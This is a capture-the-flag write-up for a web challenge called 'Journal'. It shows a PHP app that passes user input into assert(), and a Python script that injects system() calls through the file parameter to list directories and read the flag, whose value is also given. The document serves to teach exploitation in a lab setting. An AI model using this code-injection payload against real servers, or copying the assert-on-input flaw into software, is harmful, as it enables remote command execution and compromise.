# Web - Journal ## Description dear diary, there is no LFI in this app ## Downloads {% file src="" %} ## Solution The provided php file: ```php Welcome to my journal app!

"; echo "

file1.txt

"; echo "

file2.txt

"; echo "

file3.txt

"; echo "

file4.txt

"; echo "

file5.txt

"; echo "

"; if (isset($_GET['file'])) { $file = $_GET['file']; $filepath = './files/' . $file; assert("strpos('$file', '..') === false") or die("Invalid file!"); if (file_exists($filepath)) { include($filepath); } else { echo 'File not found!'; } } echo "

"; ``` It's a simple enough challenge that looks like your typical LFI but like the description says, this is not a LFI challenge. As it turns out, the `assert()` function basically works like an `eval()` function and we all know the horrors of `eval`. This page on HackTricks explains it all.

HackTricks

It is also worth noting from the provided docker file that the flag file name is appended with random characters which hinted towards getting an RCE.

Docker file

Final solution: ```python import requests import urllib.parse payload = urllib.parse.quote_plus("'.die(system('ls /')).'") print(requests.get("http://journal.chal.imaginaryctf.org/?file="+payload).text) payload = urllib.parse.quote_plus("'.die(system('cat /flag-cARdaInFg6dD10uWQQgm.txt')).'") print(requests.get("http://journal.chal.imaginaryctf.org/?file="+payload).text) ``` Flag: `ictf{assertion_failed_e3106922feb13b10}`